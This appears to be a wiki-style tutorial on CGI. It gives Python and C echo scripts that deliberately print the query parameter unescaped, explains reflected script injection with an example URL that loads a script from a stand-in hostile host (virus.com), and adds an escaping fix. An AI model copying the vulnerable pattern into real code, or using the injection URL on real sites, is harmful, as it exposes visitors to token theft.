CGI
CGI (Common Gateway Interface) is a way to make a website in any programming language that can write to standard output. It is still supported (and used by some websites) but FastCGI replaced it. Don't use this for resource-intensive code, only for handling forms or making websites that interact with low-level systems.
How it works
If it's for an interpreted language (such as Python or Perl), you put a "shebang" at the top of the document, which specifies which program to execute it with. Otherwise, skip this step.
```python
#!/bin/python3
```
Then you make it output the type of content it's going to output:
```python
print("Content-Type: text/html\n")
```
Note: in Python, print() already prints a new line, but we need 2 new lines in between the header and the HTML, which is why the string ends with an extra \n. Then you do the processing:
```python
print("<html><body><h1>Hello world</h1></body></html>")
```
You can get the GET and POST request parameters by looking at the QUERY_STRING environment variable.
Examples
These are not secure, and suffer from injection vulnerabilities. It's not too hard to make them secure doe.
Python
Main article: Python/CGI
This is an example for Python:
```python
#!/usr/bin/env python3
import os
from typing import List

if __name__ == "__main__":
    # Header, then a blank line (the "\n" plus print's own newline)
    print("Content-Type: text/html\n")
    print("<html><body>")
    qs: str = os.environ.get("QUERY_STRING", "")
    if not qs:
        print("errQr")
    else:
        val: str = ""
        # Look for the first "echo=" pair in the raw query string
        parts: List[str] = qs.split("&")
        for p in parts:
            if p.startswith("echo="):
                val = p[5:]
                break
        if val:
            # Deliberately unescaped: this is the injection discussed below
            print("<h1>Echo parameter:</h1><tt>" + val + "</tt>")
        else:
            print("<h1>Enter text</h1><FORM action=''><INPUT type='text' name='echo'><INPUT type='submit' name='button'></FORM>")
    print("</body></html>")
```
C
This is an example for C. ChatGPT made this o algo
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simple CGI: prints the value of ?echo=
int main(void) {
    char* qs = getenv("QUERY_STRING");
    char* val;

    printf("Content-Type: text/plain\r\n\r\n");

    if (!qs) {
        printf("No QUERY_STRING.\n");
        return 0;
    }

    val = strstr(qs, "echo=");
    if (!val) {
        printf("No echo parameter.\n");
        return 0;
    }

    val += 5; // skip "echo="
    printf("%s\n", val);
    return 0;
}
```
Injection vulnerabilities
If someone visits soyjak.st/cgi-bin/echo.py?echo=<script src="http://virus.com/script.js"></script> and the site simply prints the echo parameter straight into the page, the malicious script tag will run in the visitor's browser, where it can log their IP, get their account token, and more. An attacker can add extra parameters to bury the malicious part of the URL, tricking people into trusting it while the page actually executes harmful code. This is why you need to escape HTML characters.
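One way to do that escaping, as an added example that is not part of the original page: the same echo page, with the unescaped rendering next to a version that passes the value through html.escape before it reaches the markup. The function names, FORM and SAMPLE_QS are chosen for this example; the value is decoded with urllib.parse.parse_qs instead of the manual split used above.

```python
#!/usr/bin/env python3
import html
import os
from urllib.parse import parse_qs

# Constructed sample: the query string from the request described above
SAMPLE_QS = 'echo=<script src="http://virus.com/script.js"></script>'

FORM = ("<h1>Enter text</h1><form action=''>"
        "<input type='text' name='echo'>"
        "<input type='submit' name='button'></form>")


def get_echo(query_string: str) -> str:
    """Return the first URL-decoded 'echo' value, or '' if absent."""
    values = parse_qs(query_string, keep_blank_values=True).get("echo", [])
    return values[0] if values else ""


def render_unsafe(query_string: str) -> str:
    """Unescaped concatenation, the pattern the Python example above uses."""
    val = get_echo(query_string)
    if not val:
        return FORM
    return "<h1>Echo parameter:</h1><tt>" + val + "</tt>"


def render_safe(query_string: str) -> str:
    """Same page, but the value is HTML-escaped before it is embedded."""
    val = get_echo(query_string)
    if not val:
        return FORM
    # html.escape turns & < > " ' into entities, so the browser shows the
    # value as text instead of parsing it as markup.
    return "<h1>Echo parameter:</h1><tt>" + html.escape(val, quote=True) + "</tt>"


def main() -> None:
    print("Content-Type: text/html; charset=utf-8\n")
    body = render_safe(os.environ.get("QUERY_STRING", ""))
    print("<html><body>" + body + "</body></html>")


if __name__ == "__main__":
    main()
```

Escaping has to match where the value lands: html.escape covers element text and quoted attribute values, not values placed inside a script block or a URL.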